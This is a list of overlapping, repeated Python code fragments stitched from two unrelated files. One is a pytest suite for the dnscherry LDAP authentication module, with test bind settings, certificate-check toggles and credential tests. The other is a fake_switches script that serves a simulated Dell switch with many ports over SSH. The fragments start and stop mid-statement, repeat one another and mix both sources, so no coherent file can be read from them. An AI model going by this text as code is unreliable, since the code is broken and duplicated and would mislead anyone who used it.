"'auth.ldap.userdn': 'ou=People,dc=example,dc=org', 'auth.ldap.binddn': 'cn=dnscherry,dc=example,dc=org', 'auth.ldap.bindpassword': 'password', 'auth.ldap.uri': 'ldap://ldap.dnscherry.org:389', 'auth.ldap.ca': './tests/test_env/etc/dnscherry/TEST-cacert.pem', 'auth.ldap.starttls': 'off', 'auth.ldap.checkcert':",
"import logging import ldap cfg = { 'auth.ldap.module': 'dnscherry.backend.ldap', 'auth.ldap.groupdn': 'ou=groups,dc=example,dc=org', 'auth.ldap.userdn': 'ou=People,dc=example,dc=org',",
"cfg2 = cfg.copy() cfg2['uri'] = 'ldaps://ldap.dnscherry.org:636' cfg2['checkcert'] = 'on' inv = Auth(cfg2, cherrypy.log)",
"'auth.ldap.user.filter.tmpl': '(uid=%(login)s)', 'auth.ldap.group.filter.tmpl': '(member=%(userdn)s)', 'auth.ldap.dn_user_attr': 'uid', 'auth.ldap.group_attr.member': \"%(dn)s\", 'auth.ldap.timeout': 10, } def syslog_error(msg='',",
"'auth.ldap.dn_user_attr': 'uid', 'auth.ldap.group_attr.member': \"%(dn)s\", 'auth.ldap.timeout': 10, } def syslog_error(msg='', context='', severity=logging.INFO, traceback=False): pass",
"'auth.ldap.bindpassword': 'password', 'auth.ldap.uri': 'ldap://ldap.dnscherry.org:389', 'auth.ldap.ca': './tests/test_env/etc/dnscherry/TEST-cacert.pem', 'auth.ldap.starttls': 'off', 'auth.ldap.checkcert': 'off', 'auth.ldap.user.filter.tmpl': '(uid=%(login)s)', 'auth.ldap.group.filter.tmpl':",
"def testConnect(self): inv = Auth(cfg, cherrypy.log) ldap = inv._connect() ldap.simple_bind_s(inv.binddn, inv.bindpassword) return True",
"try: ldapc = inv._connect() ldapc.simple_bind_s(inv.binddn, inv.bindpassword) except ldap.SERVER_DOWN as e: return def testMissingCA(self):",
"cfg2['checkcert'] = 'on' inv = Auth(cfg2, cherrypy.log) ldapc = inv._connect() try: ldapc.simple_bind_s(inv.binddn, inv.bindpassword)",
"testAuthSuccess(self): inv = Auth(cfg, cherrypy.log) ret = inv.check_credentials('jwatson', '<PASSWORD>') assert ret == True",
"Auth(cfg, cherrypy.log) ret = inv.check_credentials('jwatson', '<PASSWORD>') assert ret == True def testAuthFailure(self): inv",
"'ou=groups,dc=example,dc=org', 'auth.ldap.userdn': 'ou=People,dc=example,dc=org', 'auth.ldap.binddn': 'cn=dnscherry,dc=example,dc=org', 'auth.ldap.bindpassword': 'password', 'auth.ldap.uri': 'ldap://ldap.dnscherry.org:389', 'auth.ldap.ca': './tests/test_env/etc/dnscherry/TEST-cacert.pem', 'auth.ldap.starttls': 'off',",
"= Auth(cfg, cherrypy.log) res = inv.check_credentials('notauser', 'password') or inv.check_credentials('jwatson', '<PASSWORD>') assert res ==",
"from dnscherry.auth.modLdap import Auth, CaFileDontExist import cherrypy import logging import ldap cfg =",
"import cherrypy import logging import ldap cfg = { 'auth.ldap.module': 'dnscherry.backend.ldap', 'auth.ldap.groupdn': 'ou=groups,dc=example,dc=org',",
"cherrypy.log) return True def testConnectSSLNoCheck(self): cfg2 = cfg.copy() cfg2['uri'] = 'ldaps://ldap.dnscherry.org:636' cfg2['checkcert'] =",
"= Auth(cfg, cherrypy.log) return True def testConnectSSLNoCheck(self): cfg2 = cfg.copy() cfg2['uri'] = 'ldaps://ldap.dnscherry.org:636'",
"'uidNumber', 'gidNumber', 'home', 'userPassword', 'givenName', 'email', 'sn'] class TestError(object): def testNominal(self): inv =",
"Auth, CaFileDontExist import cherrypy import logging import ldap cfg = { 'auth.ldap.module': 'dnscherry.backend.ldap',",
"cherrypy import logging import ldap cfg = { 'auth.ldap.module': 'dnscherry.backend.ldap', 'auth.ldap.groupdn': 'ou=groups,dc=example,dc=org', 'auth.ldap.userdn':",
"'auth.ldap.ca': './tests/test_env/etc/dnscherry/TEST-cacert.pem', 'auth.ldap.starttls': 'off', 'auth.ldap.checkcert': 'off', 'auth.ldap.user.filter.tmpl': '(uid=%(login)s)', 'auth.ldap.group.filter.tmpl': '(member=%(userdn)s)', 'auth.ldap.dn_user_attr': 'uid', 'auth.ldap.group_attr.member':",
"except ldap.SERVER_DOWN as e: return def testMissingCA(self): cfg2 = cfg.copy() cfg2['uri'] = 'ldaps://ldap.dnscherry.org:636'",
"'on' cfg2['ca'] = './test/cfg/not_a_ca.crt' try: inv = Auth(cfg2, cherrypy.log) ldapc = inv._connect() except",
"inv._connect() ldap.simple_bind_s(inv.binddn, inv.bindpassword) return True def testConnectSSL(self): cfg2 = cfg.copy() cfg2['uri'] = 'ldaps://ldap.dnscherry.org:636'",
"} def syslog_error(msg='', context='', severity=logging.INFO, traceback=False): pass cherrypy.log.error = syslog_error attr = ['shéll',",
"cfg2['uri'] = 'ldaps://ldap.dnscherry.org:636' cfg2['checkcert'] = 'on' inv = Auth(cfg2, cherrypy.log) ldap = inv._connect()",
"inv = Auth(cfg2, cherrypy.log) ldap = inv._connect() ldap.simple_bind_s(inv.binddn, inv.bindpassword) def testLdapUnavaible(self): cfg2 =",
"testLdapUnavaible(self): cfg2 = cfg.copy() cfg2['uri'] = 'ldaps://notaldap:636' cfg2['checkcert'] = 'on' inv = Auth(cfg2,",
"'on' cfg2['ca'] = './test/cfg/ca.crt' inv = Auth(cfg2, cherrypy.log) ldapc = inv._connect() ldapc.simple_bind_s(inv.binddn, inv.bindpassword)",
"= Auth(cfg, cherrypy.log) ret = inv.check_credentials('jwatson', '<PASSWORD>') assert ret == True def testAuthFailure(self):",
"ldapc.simple_bind_s(inv.binddn, inv.bindpassword) except ldap.SERVER_DOWN as e: return def testMissingCA(self): cfg2 = cfg.copy() cfg2['uri']",
"-*- coding: utf-8 -*- from __future__ import with_statement from __future__ import unicode_literals import",
"or inv.check_credentials('jwatson', '<PASSWORD>') assert res == False def testMissingParam(self): cfg2 = {} return",
"True def testConnectSSL(self): cfg2 = cfg.copy() cfg2['uri'] = 'ldaps://ldap.dnscherry.org:636' cfg2['checkcert'] = 'on' inv",
"inv.check_credentials('notauser', 'password') or inv.check_credentials('jwatson', '<PASSWORD>') assert res == False def testMissingParam(self): cfg2 =",
"coding: utf-8 -*- from __future__ import with_statement from __future__ import unicode_literals import pytest",
"= './test/cfg/ca.crt' inv = Auth(cfg2, cherrypy.log) ldapc = inv._connect() ldapc.simple_bind_s(inv.binddn, inv.bindpassword) def testAuthSuccess(self):",
"= Auth(cfg, cherrypy.log) ldap = inv._connect() ldap.simple_bind_s(inv.binddn, inv.bindpassword) return True def testConnectSSL(self): cfg2",
"= cfg.copy() cfg2['uri'] = 'ldaps://ldap.dnscherry.org:636' cfg2['checkcert'] = 'on' inv = Auth(cfg2, cherrypy.log) ldapc",
"'ldaps://notaldap:636' cfg2['checkcert'] = 'on' inv = Auth(cfg2, cherrypy.log) try: ldapc = inv._connect() ldapc.simple_bind_s(inv.binddn,",
"'gidNumber', 'home', 'userPassword', 'givenName', 'email', 'sn'] class TestError(object): def testNominal(self): inv = Auth(cfg,",
"= './test/cfg/not_a_ca.crt' try: inv = Auth(cfg2, cherrypy.log) ldapc = inv._connect() except CaFileDontExist as",
"pytest import sys from sets import Set from dnscherry.auth.modLdap import Auth, CaFileDontExist import",
"cfg.copy() cfg2['uri'] = 'ldaps://notaldap:636' cfg2['checkcert'] = 'on' inv = Auth(cfg2, cherrypy.log) try: ldapc",
"testAuthFailure(self): inv = Auth(cfg, cherrypy.log) res = inv.check_credentials('notauser', 'password') or inv.check_credentials('jwatson', '<PASSWORD>') assert",
"Set from dnscherry.auth.modLdap import Auth, CaFileDontExist import cherrypy import logging import ldap cfg",
"return def testMissingCA(self): cfg2 = cfg.copy() cfg2['uri'] = 'ldaps://ldap.dnscherry.org:636' cfg2['checkcert'] = 'on' cfg2['ca']",
"cfg2['ca'] = './test/cfg/not_a_ca.crt' try: inv = Auth(cfg2, cherrypy.log) ldapc = inv._connect() except CaFileDontExist",
"cherrypy.log) ldapc = inv._connect() except CaFileDontExist as e: return def testConnectSSLWrongCA(self): cfg2 =",
"match CN in peer certificate' def testConnectStartTLS(self): cfg2 = cfg.copy() cfg2['uri'] = 'ldap://ldap.dnscherry.org:390'",
"from __future__ import with_statement from __future__ import unicode_literals import pytest import sys from",
"cfg.copy() cfg2['uri'] = 'ldaps://ldap.dnscherry.org:636' cfg2['checkcert'] = 'on' inv = Auth(cfg2, cherrypy.log) ldap =",
"cfg2['uri'] = 'ldaps://ldap.dnscherry.org:636' cfg2['checkcert'] = 'off' inv = Auth(cfg2, cherrypy.log) ldap = inv._connect()",
"assert e[0]['info'] == 'TLS: hostname does not match CN in peer certificate' def",
"certificate' def testConnectStartTLS(self): cfg2 = cfg.copy() cfg2['uri'] = 'ldap://ldap.dnscherry.org:390' cfg2['checkcert'] = 'off' cfg2['starttls']",
"= 'off' inv = Auth(cfg2, cherrypy.log) ldap = inv._connect() ldap.simple_bind_s(inv.binddn, inv.bindpassword) def testConnect(self):"
] |
[
"self._access_vlan != value: self._access_vlan = value print(\"This could add vlan to eth0\") if",
"CustomPort(\"Eth1/24\"), CustomPort(\"Eth1/25\"), CustomPort(\"Eth1/26\"), CustomPort(\"Eth1/27\"), CustomPort(\"Eth1/28\"), CustomPort(\"Eth1/29\"), CustomPort(\"Eth1/30\"), CustomPort(\"Eth1/31\"), CustomPort(\"Eth1/32\"), CustomPort(\"mgmt0\"), CustomPort(\"Lo0\"), ]))) ssh_service.hook_to_reactor(reactor)",
"import SwitchSshService from fake_switches.dell.dell_core import DellSwitchCore class CustomSwitchConfiguration(SwitchConfiguration): def __init__(self, *args, **kwargs): super(CustomSwitchConfiguration,",
"import SwitchConfiguration, Port from fake_switches.transports.ssh_service import SwitchSshService from fake_switches.dell.dell_core import DellSwitchCore class CustomSwitchConfiguration(SwitchConfiguration):",
"'__main__': ssh_service = SwitchSshService( ip=\"127.0.0.1\", port=11001, switch_core=DellSwitchCore(CustomSwitchConfiguration(\"127.0.0.1\", \"NEXT-TEST\", ports=[ CustomPort(\"Eth1/1\"), CustomPort(\"Eth1/2\"), CustomPort(\"Eth1/3\"), CustomPort(\"Eth1/4\"),",
"super(CustomPort, self).__init__(name) @property def access_vlan(self): return self._access_vlan @access_vlan.setter def access_vlan(self, value): if self._access_vlan",
"access_vlan(self): return self._access_vlan @access_vlan.setter def access_vlan(self, value): if self._access_vlan != value: self._access_vlan =",
"CustomPort(\"Eth1/5\"), CustomPort(\"Eth1/6\"), CustomPort(\"Eth1/7\"), CustomPort(\"Eth1/8\"), CustomPort(\"Eth1/9\"), CustomPort(\"Eth1/10\"), CustomPort(\"Eth1/11\"), CustomPort(\"Eth1/12\"), CustomPort(\"Eth1/13\"), CustomPort(\"Eth1/14\"), CustomPort(\"Eth1/15\"), CustomPort(\"Eth1/16\"), CustomPort(\"Eth1/17\"),",
"value: self._access_vlan = value print(\"This could add vlan to eth0\") if __name__ ==",
"CustomPort(\"Eth1/4\"), CustomPort(\"Eth1/5\"), CustomPort(\"Eth1/6\"), CustomPort(\"Eth1/7\"), CustomPort(\"Eth1/8\"), CustomPort(\"Eth1/9\"), CustomPort(\"Eth1/10\"), CustomPort(\"Eth1/11\"), CustomPort(\"Eth1/12\"), CustomPort(\"Eth1/13\"), CustomPort(\"Eth1/14\"), CustomPort(\"Eth1/15\"), CustomPort(\"Eth1/16\"),",
"if self._access_vlan != value: self._access_vlan = value print(\"This could add vlan to eth0\")",
"CustomPort(\"Eth1/3\"), CustomPort(\"Eth1/4\"), CustomPort(\"Eth1/5\"), CustomPort(\"Eth1/6\"), CustomPort(\"Eth1/7\"), CustomPort(\"Eth1/8\"), CustomPort(\"Eth1/9\"), CustomPort(\"Eth1/10\"), CustomPort(\"Eth1/11\"), CustomPort(\"Eth1/12\"), CustomPort(\"Eth1/13\"), CustomPort(\"Eth1/14\"), CustomPort(\"Eth1/15\"),",
"CustomPort(Port): def __init__(self, name): self._access_vlan = None super(CustomPort, self).__init__(name) @property def access_vlan(self): return",
"@property def access_vlan(self): return self._access_vlan @access_vlan.setter def access_vlan(self, value): if self._access_vlan != value:",
"__init__(self, name): self._access_vlan = None super(CustomPort, self).__init__(name) @property def access_vlan(self): return self._access_vlan @access_vlan.setter",
"if __name__ == '__main__': ssh_service = SwitchSshService( ip=\"127.0.0.1\", port=11001, switch_core=DellSwitchCore(CustomSwitchConfiguration(\"127.0.0.1\", \"NEXT-TEST\", ports=[ CustomPort(\"Eth1/1\"),",
"CustomPort(\"Eth1/15\"), CustomPort(\"Eth1/16\"), CustomPort(\"Eth1/17\"), CustomPort(\"Eth1/18\"), CustomPort(\"Eth1/19\"), CustomPort(\"Eth1/20\"), CustomPort(\"Eth1/21\"), CustomPort(\"Eth1/22\"), CustomPort(\"Eth1/23\"), CustomPort(\"Eth1/24\"), CustomPort(\"Eth1/25\"), CustomPort(\"Eth1/26\"), CustomPort(\"Eth1/27\"),",
"CustomPort(\"Eth1/12\"), CustomPort(\"Eth1/13\"), CustomPort(\"Eth1/14\"), CustomPort(\"Eth1/15\"), CustomPort(\"Eth1/16\"), CustomPort(\"Eth1/17\"), CustomPort(\"Eth1/18\"), CustomPort(\"Eth1/19\"), CustomPort(\"Eth1/20\"), CustomPort(\"Eth1/21\"), CustomPort(\"Eth1/22\"), CustomPort(\"Eth1/23\"), CustomPort(\"Eth1/24\"),",
"fake_switches.dell.dell_core import DellSwitchCore class CustomSwitchConfiguration(SwitchConfiguration): def __init__(self, *args, **kwargs): super(CustomSwitchConfiguration, self).__init__(objects_overrides={\"Port\": CustomPort}, *args,",
"= value print(\"This could add vlan to eth0\") if __name__ == '__main__': ssh_service",
"from fake_switches.dell.dell_core import DellSwitchCore class CustomSwitchConfiguration(SwitchConfiguration): def __init__(self, *args, **kwargs): super(CustomSwitchConfiguration, self).__init__(objects_overrides={\"Port\": CustomPort},",
"ssh_service = SwitchSshService( ip=\"127.0.0.1\", port=11001, switch_core=DellSwitchCore(CustomSwitchConfiguration(\"127.0.0.1\", \"NEXT-TEST\", ports=[ CustomPort(\"Eth1/1\"), CustomPort(\"Eth1/2\"), CustomPort(\"Eth1/3\"), CustomPort(\"Eth1/4\"), CustomPort(\"Eth1/5\"),",
"__name__ == '__main__': ssh_service = SwitchSshService( ip=\"127.0.0.1\", port=11001, switch_core=DellSwitchCore(CustomSwitchConfiguration(\"127.0.0.1\", \"NEXT-TEST\", ports=[ CustomPort(\"Eth1/1\"), CustomPort(\"Eth1/2\"),",
"self._access_vlan = value print(\"This could add vlan to eth0\") if __name__ == '__main__':",
"== '__main__': ssh_service = SwitchSshService( ip=\"127.0.0.1\", port=11001, switch_core=DellSwitchCore(CustomSwitchConfiguration(\"127.0.0.1\", \"NEXT-TEST\", ports=[ CustomPort(\"Eth1/1\"), CustomPort(\"Eth1/2\"), CustomPort(\"Eth1/3\"),",
"\"NEXT-TEST\", ports=[ CustomPort(\"Eth1/1\"), CustomPort(\"Eth1/2\"), CustomPort(\"Eth1/3\"), CustomPort(\"Eth1/4\"), CustomPort(\"Eth1/5\"), CustomPort(\"Eth1/6\"), CustomPort(\"Eth1/7\"), CustomPort(\"Eth1/8\"), CustomPort(\"Eth1/9\"), CustomPort(\"Eth1/10\"), CustomPort(\"Eth1/11\"),",
"fake_switches.transports.ssh_service import SwitchSshService from fake_switches.dell.dell_core import DellSwitchCore class CustomSwitchConfiguration(SwitchConfiguration): def __init__(self, *args, **kwargs):",
"value): if self._access_vlan != value: self._access_vlan = value print(\"This could add vlan to",
"CustomPort(\"Eth1/21\"), CustomPort(\"Eth1/22\"), CustomPort(\"Eth1/23\"), CustomPort(\"Eth1/24\"), CustomPort(\"Eth1/25\"), CustomPort(\"Eth1/26\"), CustomPort(\"Eth1/27\"), CustomPort(\"Eth1/28\"), CustomPort(\"Eth1/29\"), CustomPort(\"Eth1/30\"), CustomPort(\"Eth1/31\"), CustomPort(\"Eth1/32\"), CustomPort(\"mgmt0\"),",
"CustomPort}, *args, **kwargs) class CustomPort(Port): def __init__(self, name): self._access_vlan = None super(CustomPort, self).__init__(name)",
"self._access_vlan = None super(CustomPort, self).__init__(name) @property def access_vlan(self): return self._access_vlan @access_vlan.setter def access_vlan(self,",
"CustomPort(\"Eth1/1\"), CustomPort(\"Eth1/2\"), CustomPort(\"Eth1/3\"), CustomPort(\"Eth1/4\"), CustomPort(\"Eth1/5\"), CustomPort(\"Eth1/6\"), CustomPort(\"Eth1/7\"), CustomPort(\"Eth1/8\"), CustomPort(\"Eth1/9\"), CustomPort(\"Eth1/10\"), CustomPort(\"Eth1/11\"), CustomPort(\"Eth1/12\"), CustomPort(\"Eth1/13\"),",
"add vlan to eth0\") if __name__ == '__main__': ssh_service = SwitchSshService( ip=\"127.0.0.1\", port=11001,",
"could add vlan to eth0\") if __name__ == '__main__': ssh_service = SwitchSshService( ip=\"127.0.0.1\",",
"*args, **kwargs): super(CustomSwitchConfiguration, self).__init__(objects_overrides={\"Port\": CustomPort}, *args, **kwargs) class CustomPort(Port): def __init__(self, name): self._access_vlan",
"super(CustomSwitchConfiguration, self).__init__(objects_overrides={\"Port\": CustomPort}, *args, **kwargs) class CustomPort(Port): def __init__(self, name): self._access_vlan = None",
"access_vlan(self, value): if self._access_vlan != value: self._access_vlan = value print(\"This could add vlan",
"CustomPort(\"Eth1/25\"), CustomPort(\"Eth1/26\"), CustomPort(\"Eth1/27\"), CustomPort(\"Eth1/28\"), CustomPort(\"Eth1/29\"), CustomPort(\"Eth1/30\"), CustomPort(\"Eth1/31\"), CustomPort(\"Eth1/32\"), CustomPort(\"mgmt0\"), CustomPort(\"Lo0\"), ]))) ssh_service.hook_to_reactor(reactor) reactor.run()",
"CustomPort(\"Eth1/17\"), CustomPort(\"Eth1/18\"), CustomPort(\"Eth1/19\"), CustomPort(\"Eth1/20\"), CustomPort(\"Eth1/21\"), CustomPort(\"Eth1/22\"), CustomPort(\"Eth1/23\"), CustomPort(\"Eth1/24\"), CustomPort(\"Eth1/25\"), CustomPort(\"Eth1/26\"), CustomPort(\"Eth1/27\"), CustomPort(\"Eth1/28\"), CustomPort(\"Eth1/29\"),",
"!= value: self._access_vlan = value print(\"This could add vlan to eth0\") if __name__",
"from fake_switches.transports.ssh_service import SwitchSshService from fake_switches.dell.dell_core import DellSwitchCore class CustomSwitchConfiguration(SwitchConfiguration): def __init__(self, *args,",
"= SwitchSshService( ip=\"127.0.0.1\", port=11001, switch_core=DellSwitchCore(CustomSwitchConfiguration(\"127.0.0.1\", \"NEXT-TEST\", ports=[ CustomPort(\"Eth1/1\"), CustomPort(\"Eth1/2\"), CustomPort(\"Eth1/3\"), CustomPort(\"Eth1/4\"), CustomPort(\"Eth1/5\"), CustomPort(\"Eth1/6\"),",
"**kwargs) class CustomPort(Port): def __init__(self, name): self._access_vlan = None super(CustomPort, self).__init__(name) @property def",
"import DellSwitchCore class CustomSwitchConfiguration(SwitchConfiguration): def __init__(self, *args, **kwargs): super(CustomSwitchConfiguration, self).__init__(objects_overrides={\"Port\": CustomPort}, *args, **kwargs)",
"CustomPort(\"Eth1/2\"), CustomPort(\"Eth1/3\"), CustomPort(\"Eth1/4\"), CustomPort(\"Eth1/5\"), CustomPort(\"Eth1/6\"), CustomPort(\"Eth1/7\"), CustomPort(\"Eth1/8\"), CustomPort(\"Eth1/9\"), CustomPort(\"Eth1/10\"), CustomPort(\"Eth1/11\"), CustomPort(\"Eth1/12\"), CustomPort(\"Eth1/13\"), CustomPort(\"Eth1/14\"),",
"CustomPort(\"Eth1/19\"), CustomPort(\"Eth1/20\"), CustomPort(\"Eth1/21\"), CustomPort(\"Eth1/22\"), CustomPort(\"Eth1/23\"), CustomPort(\"Eth1/24\"), CustomPort(\"Eth1/25\"), CustomPort(\"Eth1/26\"), CustomPort(\"Eth1/27\"), CustomPort(\"Eth1/28\"), CustomPort(\"Eth1/29\"), CustomPort(\"Eth1/30\"), CustomPort(\"Eth1/31\"),",
"CustomPort(\"Eth1/18\"), CustomPort(\"Eth1/19\"), CustomPort(\"Eth1/20\"), CustomPort(\"Eth1/21\"), CustomPort(\"Eth1/22\"), CustomPort(\"Eth1/23\"), CustomPort(\"Eth1/24\"), CustomPort(\"Eth1/25\"), CustomPort(\"Eth1/26\"), CustomPort(\"Eth1/27\"), CustomPort(\"Eth1/28\"), CustomPort(\"Eth1/29\"), CustomPort(\"Eth1/30\"),",
"CustomPort(\"Eth1/23\"), CustomPort(\"Eth1/24\"), CustomPort(\"Eth1/25\"), CustomPort(\"Eth1/26\"), CustomPort(\"Eth1/27\"), CustomPort(\"Eth1/28\"), CustomPort(\"Eth1/29\"), CustomPort(\"Eth1/30\"), CustomPort(\"Eth1/31\"), CustomPort(\"Eth1/32\"), CustomPort(\"mgmt0\"), CustomPort(\"Lo0\"), ])))",
"fake_switches.switch_configuration import SwitchConfiguration, Port from fake_switches.transports.ssh_service import SwitchSshService from fake_switches.dell.dell_core import DellSwitchCore class",
"def access_vlan(self): return self._access_vlan @access_vlan.setter def access_vlan(self, value): if self._access_vlan != value: self._access_vlan",
"reactor from fake_switches.switch_configuration import SwitchConfiguration, Port from fake_switches.transports.ssh_service import SwitchSshService from fake_switches.dell.dell_core import",
"from twisted.internet import reactor from fake_switches.switch_configuration import SwitchConfiguration, Port from fake_switches.transports.ssh_service import SwitchSshService",
"twisted.internet import reactor from fake_switches.switch_configuration import SwitchConfiguration, Port from fake_switches.transports.ssh_service import SwitchSshService from",
"name): self._access_vlan = None super(CustomPort, self).__init__(name) @property def access_vlan(self): return self._access_vlan @access_vlan.setter def",
"CustomPort(\"Eth1/16\"), CustomPort(\"Eth1/17\"), CustomPort(\"Eth1/18\"), CustomPort(\"Eth1/19\"), CustomPort(\"Eth1/20\"), CustomPort(\"Eth1/21\"), CustomPort(\"Eth1/22\"), CustomPort(\"Eth1/23\"), CustomPort(\"Eth1/24\"), CustomPort(\"Eth1/25\"), CustomPort(\"Eth1/26\"), CustomPort(\"Eth1/27\"), CustomPort(\"Eth1/28\"),",
"CustomPort(\"Eth1/11\"), CustomPort(\"Eth1/12\"), CustomPort(\"Eth1/13\"), CustomPort(\"Eth1/14\"), CustomPort(\"Eth1/15\"), CustomPort(\"Eth1/16\"), CustomPort(\"Eth1/17\"), CustomPort(\"Eth1/18\"), CustomPort(\"Eth1/19\"), CustomPort(\"Eth1/20\"), CustomPort(\"Eth1/21\"), CustomPort(\"Eth1/22\"), CustomPort(\"Eth1/23\"),",
"return self._access_vlan @access_vlan.setter def access_vlan(self, value): if self._access_vlan != value: self._access_vlan = value",
"self).__init__(name) @property def access_vlan(self): return self._access_vlan @access_vlan.setter def access_vlan(self, value): if self._access_vlan !=",
"*args, **kwargs) class CustomPort(Port): def __init__(self, name): self._access_vlan = None super(CustomPort, self).__init__(name) @property",
"class CustomPort(Port): def __init__(self, name): self._access_vlan = None super(CustomPort, self).__init__(name) @property def access_vlan(self):",
"switch_core=DellSwitchCore(CustomSwitchConfiguration(\"127.0.0.1\", \"NEXT-TEST\", ports=[ CustomPort(\"Eth1/1\"), CustomPort(\"Eth1/2\"), CustomPort(\"Eth1/3\"), CustomPort(\"Eth1/4\"), CustomPort(\"Eth1/5\"), CustomPort(\"Eth1/6\"), CustomPort(\"Eth1/7\"), CustomPort(\"Eth1/8\"), CustomPort(\"Eth1/9\"), CustomPort(\"Eth1/10\"),",
"None super(CustomPort, self).__init__(name) @property def access_vlan(self): return self._access_vlan @access_vlan.setter def access_vlan(self, value): if",
"SwitchSshService from fake_switches.dell.dell_core import DellSwitchCore class CustomSwitchConfiguration(SwitchConfiguration): def __init__(self, *args, **kwargs): super(CustomSwitchConfiguration, self).__init__(objects_overrides={\"Port\":",
"to eth0\") if __name__ == '__main__': ssh_service = SwitchSshService( ip=\"127.0.0.1\", port=11001, switch_core=DellSwitchCore(CustomSwitchConfiguration(\"127.0.0.1\", \"NEXT-TEST\",",
"ports=[ CustomPort(\"Eth1/1\"), CustomPort(\"Eth1/2\"), CustomPort(\"Eth1/3\"), CustomPort(\"Eth1/4\"), CustomPort(\"Eth1/5\"), CustomPort(\"Eth1/6\"), CustomPort(\"Eth1/7\"), CustomPort(\"Eth1/8\"), CustomPort(\"Eth1/9\"), CustomPort(\"Eth1/10\"), CustomPort(\"Eth1/11\"), CustomPort(\"Eth1/12\"),",
"SwitchSshService( ip=\"127.0.0.1\", port=11001, switch_core=DellSwitchCore(CustomSwitchConfiguration(\"127.0.0.1\", \"NEXT-TEST\", ports=[ CustomPort(\"Eth1/1\"), CustomPort(\"Eth1/2\"), CustomPort(\"Eth1/3\"), CustomPort(\"Eth1/4\"), CustomPort(\"Eth1/5\"), CustomPort(\"Eth1/6\"), CustomPort(\"Eth1/7\"),",
"__init__(self, *args, **kwargs): super(CustomSwitchConfiguration, self).__init__(objects_overrides={\"Port\": CustomPort}, *args, **kwargs) class CustomPort(Port): def __init__(self, name):",
"CustomPort(\"Eth1/6\"), CustomPort(\"Eth1/7\"), CustomPort(\"Eth1/8\"), CustomPort(\"Eth1/9\"), CustomPort(\"Eth1/10\"), CustomPort(\"Eth1/11\"), CustomPort(\"Eth1/12\"), CustomPort(\"Eth1/13\"), CustomPort(\"Eth1/14\"), CustomPort(\"Eth1/15\"), CustomPort(\"Eth1/16\"), CustomPort(\"Eth1/17\"), CustomPort(\"Eth1/18\"),",
"**kwargs): super(CustomSwitchConfiguration, self).__init__(objects_overrides={\"Port\": CustomPort}, *args, **kwargs) class CustomPort(Port): def __init__(self, name): self._access_vlan =",
"def access_vlan(self, value): if self._access_vlan != value: self._access_vlan = value print(\"This could add",
"ip=\"127.0.0.1\", port=11001, switch_core=DellSwitchCore(CustomSwitchConfiguration(\"127.0.0.1\", \"NEXT-TEST\", ports=[ CustomPort(\"Eth1/1\"), CustomPort(\"Eth1/2\"), CustomPort(\"Eth1/3\"), CustomPort(\"Eth1/4\"), CustomPort(\"Eth1/5\"), CustomPort(\"Eth1/6\"), CustomPort(\"Eth1/7\"), CustomPort(\"Eth1/8\"),",
"CustomPort(\"Eth1/14\"), CustomPort(\"Eth1/15\"), CustomPort(\"Eth1/16\"), CustomPort(\"Eth1/17\"), CustomPort(\"Eth1/18\"), CustomPort(\"Eth1/19\"), CustomPort(\"Eth1/20\"), CustomPort(\"Eth1/21\"), CustomPort(\"Eth1/22\"), CustomPort(\"Eth1/23\"), CustomPort(\"Eth1/24\"), CustomPort(\"Eth1/25\"), CustomPort(\"Eth1/26\"),",
"CustomPort(\"Eth1/8\"), CustomPort(\"Eth1/9\"), CustomPort(\"Eth1/10\"), CustomPort(\"Eth1/11\"), CustomPort(\"Eth1/12\"), CustomPort(\"Eth1/13\"), CustomPort(\"Eth1/14\"), CustomPort(\"Eth1/15\"), CustomPort(\"Eth1/16\"), CustomPort(\"Eth1/17\"), CustomPort(\"Eth1/18\"), CustomPort(\"Eth1/19\"), CustomPort(\"Eth1/20\"),",
"vlan to eth0\") if __name__ == '__main__': ssh_service = SwitchSshService( ip=\"127.0.0.1\", port=11001, switch_core=DellSwitchCore(CustomSwitchConfiguration(\"127.0.0.1\",",
"class CustomSwitchConfiguration(SwitchConfiguration): def __init__(self, *args, **kwargs): super(CustomSwitchConfiguration, self).__init__(objects_overrides={\"Port\": CustomPort}, *args, **kwargs) class CustomPort(Port):",
"CustomPort(\"Eth1/10\"), CustomPort(\"Eth1/11\"), CustomPort(\"Eth1/12\"), CustomPort(\"Eth1/13\"), CustomPort(\"Eth1/14\"), CustomPort(\"Eth1/15\"), CustomPort(\"Eth1/16\"), CustomPort(\"Eth1/17\"), CustomPort(\"Eth1/18\"), CustomPort(\"Eth1/19\"), CustomPort(\"Eth1/20\"), CustomPort(\"Eth1/21\"), CustomPort(\"Eth1/22\"),",
"CustomSwitchConfiguration(SwitchConfiguration): def __init__(self, *args, **kwargs): super(CustomSwitchConfiguration, self).__init__(objects_overrides={\"Port\": CustomPort}, *args, **kwargs) class CustomPort(Port): def",
"def __init__(self, name): self._access_vlan = None super(CustomPort, self).__init__(name) @property def access_vlan(self): return self._access_vlan",
"<reponame>CC-Digital-Innovation/devops-workshop from twisted.internet import reactor from fake_switches.switch_configuration import SwitchConfiguration, Port from fake_switches.transports.ssh_service import",
"value print(\"This could add vlan to eth0\") if __name__ == '__main__': ssh_service =",
"eth0\") if __name__ == '__main__': ssh_service = SwitchSshService( ip=\"127.0.0.1\", port=11001, switch_core=DellSwitchCore(CustomSwitchConfiguration(\"127.0.0.1\", \"NEXT-TEST\", ports=[",
"port=11001, switch_core=DellSwitchCore(CustomSwitchConfiguration(\"127.0.0.1\", \"NEXT-TEST\", ports=[ CustomPort(\"Eth1/1\"), CustomPort(\"Eth1/2\"), CustomPort(\"Eth1/3\"), CustomPort(\"Eth1/4\"), CustomPort(\"Eth1/5\"), CustomPort(\"Eth1/6\"), CustomPort(\"Eth1/7\"), CustomPort(\"Eth1/8\"), CustomPort(\"Eth1/9\"),",
"print(\"This could add vlan to eth0\") if __name__ == '__main__': ssh_service = SwitchSshService(",
"def __init__(self, *args, **kwargs): super(CustomSwitchConfiguration, self).__init__(objects_overrides={\"Port\": CustomPort}, *args, **kwargs) class CustomPort(Port): def __init__(self,",
"DellSwitchCore class CustomSwitchConfiguration(SwitchConfiguration): def __init__(self, *args, **kwargs): super(CustomSwitchConfiguration, self).__init__(objects_overrides={\"Port\": CustomPort}, *args, **kwargs) class",
"@access_vlan.setter def access_vlan(self, value): if self._access_vlan != value: self._access_vlan = value print(\"This could",
"SwitchConfiguration, Port from fake_switches.transports.ssh_service import SwitchSshService from fake_switches.dell.dell_core import DellSwitchCore class CustomSwitchConfiguration(SwitchConfiguration): def",
